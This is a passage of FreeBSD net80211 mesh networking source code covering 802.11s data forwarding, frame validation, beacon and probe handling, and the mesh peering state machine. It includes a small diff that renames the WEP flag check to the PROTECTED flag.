(IEEE80211_ADDR_EQ(mc10->mc_addr5, qwh->i_addr3)) { return (0); /* process locally */ } rt = ieee80211_mesh_rt_find(vap, mc10->mc_addr5); if (rt != NULL && (rt->rt_flags & IEEE80211_MESHRT_FLAGS_VALID) && (rt->rt_flags & IEEE80211_MESHRT_FLAGS_PROXY) == 0) { /* * Forward on another mesh-path, according to * amendment as specified in 9.32.4.1 */ IEEE80211_ADDR_COPY(qwh->i_addr3, mc10->mc_addr5); mesh_forward(vap, m, (const struct ieee80211_meshcntl *)mc10); return (1); /* dont process locally */ } /* * All other cases: forward of MSDUs from the MBSS to DS indiv. * addressed according to 13.11.3.2. */ IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_OUTPUT, qwh->i_addr2, "forward frame to DS, SA(%6D) DA(%6D)", mc10->mc_addr6, ":", mc10->mc_addr5, ":"); } return (0); /* process locally */ } /* * Try to forward the group addressed data on to other mesh STAs, and * also to the DS. * * > 0 means we have forwarded data and no need to process locally * == 0 means we want to process locally (and we may have forwarded data * < 0 means there was an error and data should be discarded */ static int mesh_recv_group_data(struct ieee80211vap *vap, struct mbuf *m, struct ieee80211_frame *wh, const struct ieee80211_meshcntl *mc) { #define MC01(mc) ((const struct ieee80211_meshcntl_ae01 *)mc) struct ieee80211_mesh_state *ms = vap->iv_mesh; /* This is called from the RX path - don't hold this lock */ IEEE80211_TX_UNLOCK_ASSERT(vap->iv_ic); mesh_forward(vap, m, mc); if(mc->mc_ttl > 0) { if (mc->mc_flags & IEEE80211_MESH_AE_01) { /* * Forward of MSDUs from the MBSS to DS group addressed * (according to 13.11.3.2) * This happens by delivering the packet, and a bridge * will sent it on another port member. 
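 *
 * Note the frame was already handed to mesh_forward() above for
 * retransmission inside the MBSS; returning 0 below additionally
 * delivers a copy locally, and when this vap is a bridge member it is
 * the bridge that actually pushes that copy out towards the DS.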
*/ if (ms->ms_flags & IEEE80211_MESHFLAGS_GATE && ms->ms_flags & IEEE80211_MESHFLAGS_FWD) IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, MC01(mc)->mc_addr4, "%s", "forward from MBSS to the DS"); } } return (0); /* process locally */ #undef MC01 } static int mesh_input(struct ieee80211_node *ni, struct mbuf *m, int rssi, int nf) { #define HAS_SEQ(type) ((type & 0x4) == 0) #define MC01(mc) ((const struct ieee80211_meshcntl_ae01 *)mc) #define MC10(mc) ((const struct ieee80211_meshcntl_ae10 *)mc) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = vap->iv_ifp; struct ieee80211_frame *wh; const struct ieee80211_meshcntl *mc; int hdrspace, meshdrlen, need_tap, error; uint8_t dir, type, subtype, ae; uint32_t seq; const uint8_t *addr; uint8_t qos[2]; ieee80211_seq rxseq; KASSERT(ni != NULL, ("null node")); ni->ni_inact = ni->ni_inact_reload; need_tap = 1; /* mbuf need to be tapped. */ type = -1; /* undefined */ /* This is called from the RX path - don't hold this lock */ IEEE80211_TX_UNLOCK_ASSERT(ic); if (m->m_pkthdr.len < sizeof(struct ieee80211_frame_min)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "too short (1): len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } /* * Bit of a cheat here, we use a pointer for a 3-address * frame format but don't reference fields past outside * ieee80211_frame_min w/o first validating the data is * present. */ wh = mtod(m, struct ieee80211_frame *); if ((wh->i_fc[0] & IEEE80211_FC0_VERSION_MASK) != IEEE80211_FC0_VERSION_0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "wrong version %x", wh->i_fc[0]); vap->iv_stats.is_rx_badversion++; goto err; } dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if ((ic->ic_flags & IEEE80211_F_SCAN) == 0) { IEEE80211_RSSI_LPF(ni->ni_avgrssi, rssi); ni->ni_noise = nf; if (HAS_SEQ(type)) { uint8_t tid = ieee80211_gettid(wh); if (IEEE80211_QOS_HAS_SEQ(wh) && TID_TO_WME_AC(tid) >= WME_AC_VI) ic->ic_wme.wme_hipri_traffic++; rxseq = le16toh(*(uint16_t *)wh->i_seq); if (! ieee80211_check_rxseq(ni, wh)) { /* duplicate, discard */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, wh->i_addr1, "duplicate", "seqno <%u,%u> fragno <%u,%u> tid %u", rxseq >> IEEE80211_SEQ_SEQ_SHIFT, ni->ni_rxseqs[tid] >> IEEE80211_SEQ_SEQ_SHIFT, rxseq & IEEE80211_SEQ_FRAG_MASK, ni->ni_rxseqs[tid] & IEEE80211_SEQ_FRAG_MASK, tid); vap->iv_stats.is_rx_dup++; IEEE80211_NODE_STAT(ni, rx_dup); goto out; } ni->ni_rxseqs[tid] = rxseq; } } #ifdef IEEE80211_DEBUG /* * It's easier, but too expensive, to simulate different mesh * topologies by consulting the ACL policy very early, so do this * only under DEBUG. * * NB: this check is also done upon peering link initiation. 
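 *
 * With this in place a multi-hop topology can be emulated on a single
 * broadcast domain by installing MAC ACL deny entries for neighbors
 * that should appear out of range; their frames are dropped here
 * before any peering or forwarding state is built for them.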
*/ if (vap->iv_acl != NULL && !vap->iv_acl->iac_check(vap, wh)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_ACL, wh, NULL, "%s", "disallowed by ACL"); vap->iv_stats.is_rx_acl++; goto out; } #endif switch (type) { case IEEE80211_FC0_TYPE_DATA: if (ni == vap->iv_bss) goto out; if (ni->ni_mlstate != IEEE80211_NODE_MESH_ESTABLISHED) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_MESH, ni->ni_macaddr, NULL, "peer link not yet established (%d)", ni->ni_mlstate); vap->iv_stats.is_mesh_nolink++; goto out; } if (dir != IEEE80211_FC1_DIR_FROMDS && dir != IEEE80211_FC1_DIR_DSTODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto err; } /* All Mesh data frames are QoS subtype */ if (!HAS_SEQ(type)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect subtype 0x%x", subtype); vap->iv_stats.is_rx_badsubtype++; goto err; } /* * Next up, any fragmentation. * XXX: we defrag before we even try to forward, * Mesh Control field is not present in sub-sequent * fragmented frames. This is in contrast to Draft 4.0. */ hdrspace = ieee80211_hdrspace(ic, wh); if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { m = ieee80211_defrag(ni, m, hdrspace); if (m == NULL) { /* Fragment dropped or frame not complete yet */ goto out; } } wh = mtod(m, struct ieee80211_frame *); /* NB: after defrag */ /* * Now we have a complete Mesh Data frame. */ /* * Only fromDStoDS data frames use 4 address qos frames * as specified in amendment. Otherwise addr4 is located * in the Mesh Control field and a 3 address qos frame * is used. */ if (IEEE80211_IS_DSTODS(wh)) *(uint16_t *)qos = *(uint16_t *) ((struct ieee80211_qosframe_addr4 *)wh)->i_qos; else *(uint16_t *)qos = *(uint16_t *) ((struct ieee80211_qosframe *)wh)->i_qos; /* * NB: The mesh STA sets the Mesh Control Present * subfield to 1 in the Mesh Data frame containing * an unfragmented MSDU, an A-MSDU, or the first * fragment of an MSDU. * After defrag it should always be present. */ if (!(qos[1] & IEEE80211_QOS_MC)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_MESH, ni->ni_macaddr, NULL, "%s", "Mesh control field not present"); vap->iv_stats.is_rx_elem_missing++; /* XXX: kinda */ goto err; } /* pull up enough to get to the mesh control */ if (m->m_len < hdrspace + sizeof(struct ieee80211_meshcntl) && (m = m_pullup(m, hdrspace + sizeof(struct ieee80211_meshcntl))) == NULL) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "data too short: expecting %u", hdrspace); vap->iv_stats.is_rx_tooshort++; goto out; /* XXX */ } /* * Now calculate the full extent of the headers. Note * mesh_decap will pull up anything we didn't get * above when it strips the 802.11 headers. */ mc = (const struct ieee80211_meshcntl *) (mtod(m, const uint8_t *) + hdrspace); ae = mc->mc_flags & IEEE80211_MESH_AE_MASK; meshdrlen = sizeof(struct ieee80211_meshcntl) + ae * IEEE80211_ADDR_LEN; hdrspace += meshdrlen; /* pull complete hdrspace = ieee80211_hdrspace + meshcontrol */ if ((meshdrlen > sizeof(struct ieee80211_meshcntl)) && (m->m_len < hdrspace) && ((m = m_pullup(m, hdrspace)) == NULL)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "data too short: expecting %u", hdrspace); vap->iv_stats.is_rx_tooshort++; goto out; /* XXX */ } /* XXX: are we sure there is no reallocating after m_pullup? 
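 *
 * m_pullup() may allocate a fresh leading mbuf and copy the header
 * data into it, in which case pointers computed beforehand (wh and mc
 * here) would still reference the old storage; re-deriving both via
 * mtod() after every successful pullup would be the defensive answer
 * to the question above.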
*/ seq = LE_READ_4(mc->mc_seq); if (IEEE80211_IS_MULTICAST(wh->i_addr1)) addr = wh->i_addr3; else if (ae == IEEE80211_MESH_AE_01) addr = MC01(mc)->mc_addr4; else addr = ((struct ieee80211_qosframe_addr4 *)wh)->i_addr4; if (IEEE80211_ADDR_EQ(vap->iv_myaddr, addr)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, addr, "data", "%s", "not to me"); vap->iv_stats.is_rx_wrongbss++; /* XXX kinda */ goto out; } if (mesh_checkpseq(vap, addr, seq) != 0) { vap->iv_stats.is_rx_dup++; goto out; } /* This code "routes" the frame to the right control path */ if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { if (IEEE80211_ADDR_EQ(vap->iv_myaddr, wh->i_addr3)) error = mesh_recv_indiv_data_to_me(vap, m, wh, mc); else if (IEEE80211_IS_MULTICAST(wh->i_addr3)) error = mesh_recv_group_data(vap, m, wh, mc); else error = mesh_recv_indiv_data_to_fwrd(vap, m, wh, mc); } else error = mesh_recv_group_data(vap, m, wh, mc); if (error < 0) goto err; else if (error > 0) goto out; if (ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); need_tap = 0; /* * Finally, strip the 802.11 header. */ m = mesh_decap(vap, m, hdrspace, meshdrlen); if (m == NULL) { /* XXX mask bit to check for both */ /* don't count Null data frames as errors */ if (subtype == IEEE80211_FC0_SUBTYPE_NODATA || subtype == IEEE80211_FC0_SUBTYPE_QOS_NULL) goto out; IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "decap error"); vap->iv_stats.is_rx_decap++; IEEE80211_NODE_STAT(ni, rx_decap); goto err; } if (qos[0] & IEEE80211_QOS_AMSDU) { m = ieee80211_decap_amsdu(ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; } ieee80211_deliver_data(vap, ni, m); return type; case IEEE80211_FC0_TYPE_MGT: vap->iv_stats.is_rx_mgmt++; IEEE80211_NODE_STAT(ni, rx_mgmt); if (dir != IEEE80211_FC1_DIR_NODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "mgt", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto err; } if (m->m_pkthdr.len < sizeof(struct ieee80211_frame)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, "mgt", "too short: len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } #ifdef IEEE80211_DEBUG if ((ieee80211_msg_debug(vap) && (vap->iv_ic->ic_flags & IEEE80211_F_SCAN)) || ieee80211_msg_dumppkts(vap)) { if_printf(ifp, "received %s from %s rssi %d\n", ieee80211_mgt_subtype_name[subtype >> IEEE80211_FC0_SUBTYPE_SHIFT], ether_sprintf(wh->i_addr2), rssi); } #endif - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "WEP set but not permitted"); vap->iv_stats.is_rx_mgtdiscard++; /* XXX */ goto out; } vap->iv_recv_mgmt(ni, m, subtype, rssi, nf); goto out; case IEEE80211_FC0_TYPE_CTL: vap->iv_stats.is_rx_ctl++; IEEE80211_NODE_STAT(ni, rx_ctrl); goto out; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "bad", "frame type 0x%x", type); /* should not come here */ break; } err: ifp->if_ierrors++; out: if (m != NULL) { if (need_tap && ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); m_freem(m); } return type; #undef HAS_SEQ #undef MC01 #undef MC10 } static void mesh_recv_mgmt(struct ieee80211_node *ni, struct mbuf *m0, int subtype, int rssi, int nf) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; struct ieee80211_mesh_route *rt; uint8_t *frm, *efrm; wh = mtod(m0, struct ieee80211_frame *); frm = (uint8_t *)&wh[1]; efrm = mtod(m0, uint8_t *) + m0->m_len; 
switch (subtype) { case IEEE80211_FC0_SUBTYPE_PROBE_RESP: case IEEE80211_FC0_SUBTYPE_BEACON: { struct ieee80211_scanparams scan; /* * We process beacon/probe response * frames to discover neighbors. */ if (ieee80211_parse_beacon(ni, m0, &scan) != 0) return; /* * Count frame now that we know it's to be processed. */ if (subtype == IEEE80211_FC0_SUBTYPE_BEACON) { vap->iv_stats.is_rx_beacon++; /* XXX remove */ IEEE80211_NODE_STAT(ni, rx_beacons); } else IEEE80211_NODE_STAT(ni, rx_proberesp); /* * If scanning, just pass information to the scan module. */ if (ic->ic_flags & IEEE80211_F_SCAN) { if (ic->ic_flags_ext & IEEE80211_FEXT_PROBECHAN) { /* * Actively scanning a channel marked passive; * send a probe request now that we know there * is 802.11 traffic present. * * XXX check if the beacon we recv'd gives * us what we need and suppress the probe req */ ieee80211_probe_curchan(vap, 1); ic->ic_flags_ext &= ~IEEE80211_FEXT_PROBECHAN; } ieee80211_add_scan(vap, &scan, wh, subtype, rssi, nf); return; } /* The rest of this code assumes we are running */ if (vap->iv_state != IEEE80211_S_RUN) return; /* * Ignore non-mesh STAs. */ if ((scan.capinfo & (IEEE80211_CAPINFO_ESS|IEEE80211_CAPINFO_IBSS)) || scan.meshid == NULL || scan.meshconf == NULL) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "beacon", "%s", "not a mesh sta"); vap->iv_stats.is_mesh_wrongmesh++; return; } /* * Ignore STAs for other mesh networks. */ if (memcmp(scan.meshid+2, ms->ms_id, ms->ms_idlen) != 0 || mesh_verify_meshconf(vap, scan.meshconf)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "beacon", "%s", "not for our mesh"); vap->iv_stats.is_mesh_wrongmesh++; return; } /* * Peer only based on the current ACL policy. */ if (vap->iv_acl != NULL && !vap->iv_acl->iac_check(vap, wh)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_ACL, wh, NULL, "%s", "disallowed by ACL"); vap->iv_stats.is_rx_acl++; return; } /* * Do neighbor discovery. */ if (!IEEE80211_ADDR_EQ(wh->i_addr2, ni->ni_macaddr)) { /* * Create a new entry in the neighbor table. */ ni = ieee80211_add_neighbor(vap, wh, &scan); } /* * Automatically peer with discovered nodes if possible. 
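 *
 * Starting from IDLE this is what bootstraps the MPM handshake: pick
 * a random local link ID, move to OPENSNT, send a self-protected PEER
 * OPEN action and arm the peering timer; the remaining transitions are
 * driven by the mesh_recv_action_meshpeering_* handlers.  ni_mlhcnt
 * throttles nodes that keep failing (see the backofftimeout sysctl),
 * and for an already ESTABLISHED peer a valid beacon merely refreshes
 * the route lifetime.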
*/ if (ni != vap->iv_bss && (ms->ms_flags & IEEE80211_MESHFLAGS_AP)) { switch (ni->ni_mlstate) { case IEEE80211_NODE_MESH_IDLE: { uint16_t args[1]; /* Wait for backoff callout to reset counter */ if (ni->ni_mlhcnt >= ieee80211_mesh_maxholding) return; ni->ni_mlpid = mesh_generateid(vap); if (ni->ni_mlpid == 0) return; mesh_linkchange(ni, IEEE80211_NODE_MESH_OPENSNT); args[0] = ni->ni_mlpid; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_OPEN, args); ni->ni_mlrcnt = 0; mesh_peer_timeout_setup(ni); break; } case IEEE80211_NODE_MESH_ESTABLISHED: { /* * Valid beacon from a peer mesh STA * bump TA lifetime */ rt = ieee80211_mesh_rt_find(vap, wh->i_addr2); if(rt != NULL) { ieee80211_mesh_rt_update(rt, ticks_to_msecs( ms->ms_ppath->mpp_inact)); } break; } default: break; /* ignore */ } } break; } case IEEE80211_FC0_SUBTYPE_PROBE_REQ: { uint8_t *ssid, *meshid, *rates, *xrates; uint8_t *sfrm; if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "wrong state %s", ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_rx_mgtdiscard++; return; } if (IEEE80211_IS_MULTICAST(wh->i_addr2)) { /* frame must be directed */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not unicast"); vap->iv_stats.is_rx_mgtdiscard++; /* XXX stat */ return; } /* * prreq frame format * [tlv] ssid * [tlv] supported rates * [tlv] extended supported rates * [tlv] mesh id */ ssid = meshid = rates = xrates = NULL; sfrm = frm; while (efrm - frm > 1) { IEEE80211_VERIFY_LENGTH(efrm - frm, frm[1] + 2, return); switch (*frm) { case IEEE80211_ELEMID_SSID: ssid = frm; break; case IEEE80211_ELEMID_RATES: rates = frm; break; case IEEE80211_ELEMID_XRATES: xrates = frm; break; case IEEE80211_ELEMID_MESHID: meshid = frm; break; } frm += frm[1] + 2; } IEEE80211_VERIFY_ELEMENT(ssid, IEEE80211_NWID_LEN, return); IEEE80211_VERIFY_ELEMENT(rates, IEEE80211_RATE_MAXSIZE, return); if (xrates != NULL) IEEE80211_VERIFY_ELEMENT(xrates, IEEE80211_RATE_MAXSIZE - rates[1], return); if (meshid != NULL) { IEEE80211_VERIFY_ELEMENT(meshid, IEEE80211_MESHID_LEN, return); /* NB: meshid, not ssid */ IEEE80211_VERIFY_SSID(vap->iv_bss, meshid, return); } /* XXX find a better class or define it's own */ IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_INPUT, wh->i_addr2, "%s", "recv probe req"); /* * Some legacy 11b clients cannot hack a complete * probe response frame. When the request includes * only a bare-bones rate set, communicate this to * the transmit side. 
*/ ieee80211_send_proberesp(vap, wh->i_addr2, 0); break; } case IEEE80211_FC0_SUBTYPE_ACTION: case IEEE80211_FC0_SUBTYPE_ACTION_NOACK: if (ni == vap->iv_bss) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "unknown node"); vap->iv_stats.is_rx_mgtdiscard++; } else if (!IEEE80211_ADDR_EQ(vap->iv_myaddr, wh->i_addr1) && !IEEE80211_IS_MULTICAST(wh->i_addr1)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not for us"); vap->iv_stats.is_rx_mgtdiscard++; } else if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "wrong state %s", ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_rx_mgtdiscard++; } else { if (ieee80211_parse_action(ni, m0) == 0) (void)ic->ic_recv_action(ni, wh, frm, efrm); } break; case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_REASSOC_REQ: case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: case IEEE80211_FC0_SUBTYPE_ATIM: case IEEE80211_FC0_SUBTYPE_DISASSOC: case IEEE80211_FC0_SUBTYPE_AUTH: case IEEE80211_FC0_SUBTYPE_DEAUTH: IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not handled"); vap->iv_stats.is_rx_mgtdiscard++; break; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "mgt", "subtype 0x%x not handled", subtype); vap->iv_stats.is_rx_badsubtype++; break; } } static void mesh_recv_ctl(struct ieee80211_node *ni, struct mbuf *m, int subtype) { switch (subtype) { case IEEE80211_FC0_SUBTYPE_BAR: ieee80211_recv_bar(ni, m); break; } } /* * Parse meshpeering action ie's for MPM frames */ static const struct ieee80211_meshpeer_ie * mesh_parse_meshpeering_action(struct ieee80211_node *ni, const struct ieee80211_frame *wh, /* XXX for VERIFY_LENGTH */ const uint8_t *frm, const uint8_t *efrm, struct ieee80211_meshpeer_ie *mp, uint8_t subtype) { struct ieee80211vap *vap = ni->ni_vap; const struct ieee80211_meshpeer_ie *mpie; uint16_t args[3]; const uint8_t *meshid, *meshconf, *meshpeer; uint8_t sendclose = 0; /* 1 = MPM frame rejected, close will be sent */ meshid = meshconf = meshpeer = NULL; while (efrm - frm > 1) { IEEE80211_VERIFY_LENGTH(efrm - frm, frm[1] + 2, return NULL); switch (*frm) { case IEEE80211_ELEMID_MESHID: meshid = frm; break; case IEEE80211_ELEMID_MESHCONF: meshconf = frm; break; case IEEE80211_ELEMID_MESHPEER: meshpeer = frm; mpie = (const struct ieee80211_meshpeer_ie *) frm; memset(mp, 0, sizeof(*mp)); mp->peer_len = mpie->peer_len; mp->peer_proto = LE_READ_2(&mpie->peer_proto); mp->peer_llinkid = LE_READ_2(&mpie->peer_llinkid); switch (subtype) { case IEEE80211_ACTION_MESHPEERING_CONFIRM: mp->peer_linkid = LE_READ_2(&mpie->peer_linkid); break; case IEEE80211_ACTION_MESHPEERING_CLOSE: /* NB: peer link ID is optional */ if (mpie->peer_len == (IEEE80211_MPM_BASE_SZ + 2)) { mp->peer_linkid = 0; mp->peer_rcode = LE_READ_2(&mpie->peer_linkid); } else { mp->peer_linkid = LE_READ_2(&mpie->peer_linkid); mp->peer_rcode = LE_READ_2(&mpie->peer_rcode); } break; } break; } frm += frm[1] + 2; } /* * Verify the contents of the frame. * If it fails validation, close the peer link. */ if (mesh_verify_meshpeer(vap, subtype, (const uint8_t *)mp)) { sendclose = 1; IEEE80211_DISCARD(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, wh, NULL, "%s", "MPM validation failed"); } /* If meshid is not the same reject any frames type. 
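 * That is, an MPM frame carrying a different mesh ID is rejected no
 * matter what its subtype is; CLOSE is the special case handled below,
 * where we return NULL without answering so that two nodes in
 * different meshes cannot ping-pong CLOSE frames at each other
 * forever.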
*/ if (sendclose == 0 && mesh_verify_meshid(vap, meshid)) { sendclose = 1; IEEE80211_DISCARD(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, wh, NULL, "%s", "not for our mesh"); if (subtype == IEEE80211_ACTION_MESHPEERING_CLOSE) { /* * Standard not clear about this, if we dont ignore * there will be an endless loop between nodes sending * CLOSE frames between each other with wrong meshid. * Discard and timers will bring FSM to IDLE state. */ return NULL; } } /* * Close frames are accepted if meshid is the same. * Verify the other two types. */ if (sendclose == 0 && subtype != IEEE80211_ACTION_MESHPEERING_CLOSE && mesh_verify_meshconf(vap, meshconf)) { sendclose = 1; IEEE80211_DISCARD(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, wh, NULL, "%s", "configuration missmatch"); } if (sendclose) { vap->iv_stats.is_rx_mgtdiscard++; switch (ni->ni_mlstate) { case IEEE80211_NODE_MESH_IDLE: case IEEE80211_NODE_MESH_ESTABLISHED: case IEEE80211_NODE_MESH_HOLDING: /* ignore */ break; case IEEE80211_NODE_MESH_OPENSNT: case IEEE80211_NODE_MESH_OPENRCV: case IEEE80211_NODE_MESH_CONFIRMRCV: args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; /* Reason codes for rejection */ switch (subtype) { case IEEE80211_ACTION_MESHPEERING_OPEN: args[2] = IEEE80211_REASON_MESH_CPVIOLATION; break; case IEEE80211_ACTION_MESHPEERING_CONFIRM: args[2] = IEEE80211_REASON_MESH_INCONS_PARAMS; break; } ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); mesh_linkchange(ni, IEEE80211_NODE_MESH_HOLDING); mesh_peer_timeout_setup(ni); break; } return NULL; } return (const struct ieee80211_meshpeer_ie *) mp; } static int mesh_recv_action_meshpeering_open(struct ieee80211_node *ni, const struct ieee80211_frame *wh, const uint8_t *frm, const uint8_t *efrm) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_meshpeer_ie ie; const struct ieee80211_meshpeer_ie *meshpeer; uint16_t args[3]; /* +2+2 for action + code + capabilites */ meshpeer = mesh_parse_meshpeering_action(ni, wh, frm+2+2, efrm, &ie, IEEE80211_ACTION_MESHPEERING_OPEN); if (meshpeer == NULL) { return 0; } /* XXX move up */ IEEE80211_NOTE(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, ni, "recv PEER OPEN, lid 0x%x", meshpeer->peer_llinkid); switch (ni->ni_mlstate) { case IEEE80211_NODE_MESH_IDLE: /* Reject open request if reached our maximum neighbor count */ if (ms->ms_neighbors >= IEEE80211_MESH_MAX_NEIGHBORS) { args[0] = meshpeer->peer_llinkid; args[1] = 0; args[2] = IEEE80211_REASON_MESH_MAX_PEERS; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); /* stay in IDLE state */ return (0); } /* Open frame accepted */ mesh_linkchange(ni, IEEE80211_NODE_MESH_OPENRCV); ni->ni_mllid = meshpeer->peer_llinkid; ni->ni_mlpid = mesh_generateid(vap); if (ni->ni_mlpid == 0) return 0; /* XXX */ args[0] = ni->ni_mlpid; /* Announce we're open too... */ ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_OPEN, args); /* ...and confirm the link. 
*/ args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CONFIRM, args); mesh_peer_timeout_setup(ni); break; case IEEE80211_NODE_MESH_OPENRCV: /* Wrong Link ID */ if (ni->ni_mllid != meshpeer->peer_llinkid) { args[0] = ni->ni_mllid; args[1] = ni->ni_mlpid; args[2] = IEEE80211_REASON_PEER_LINK_CANCELED; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); mesh_linkchange(ni, IEEE80211_NODE_MESH_HOLDING); mesh_peer_timeout_setup(ni); break; } /* Duplicate open, confirm again. */ args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CONFIRM, args); break; case IEEE80211_NODE_MESH_OPENSNT: ni->ni_mllid = meshpeer->peer_llinkid; mesh_linkchange(ni, IEEE80211_NODE_MESH_OPENRCV); args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CONFIRM, args); /* NB: don't setup/clear any timeout */ break; case IEEE80211_NODE_MESH_CONFIRMRCV: if (ni->ni_mlpid != meshpeer->peer_linkid || ni->ni_mllid != meshpeer->peer_llinkid) { args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; args[2] = IEEE80211_REASON_PEER_LINK_CANCELED; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); mesh_linkchange(ni, IEEE80211_NODE_MESH_HOLDING); mesh_peer_timeout_setup(ni); break; } mesh_linkchange(ni, IEEE80211_NODE_MESH_ESTABLISHED); ni->ni_mllid = meshpeer->peer_llinkid; args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CONFIRM, args); mesh_peer_timeout_stop(ni); break; case IEEE80211_NODE_MESH_ESTABLISHED: if (ni->ni_mllid != meshpeer->peer_llinkid) { args[0] = ni->ni_mllid; args[1] = ni->ni_mlpid; args[2] = IEEE80211_REASON_PEER_LINK_CANCELED; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); mesh_linkchange(ni, IEEE80211_NODE_MESH_HOLDING); mesh_peer_timeout_setup(ni); break; } args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CONFIRM, args); break; case IEEE80211_NODE_MESH_HOLDING: args[0] = ni->ni_mlpid; args[1] = meshpeer->peer_llinkid; /* Standard not clear about what the reaason code should be */ args[2] = IEEE80211_REASON_PEER_LINK_CANCELED; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); break; } return 0; } static int mesh_recv_action_meshpeering_confirm(struct ieee80211_node *ni, const struct ieee80211_frame *wh, const uint8_t *frm, const uint8_t *efrm) { struct ieee80211vap *vap = 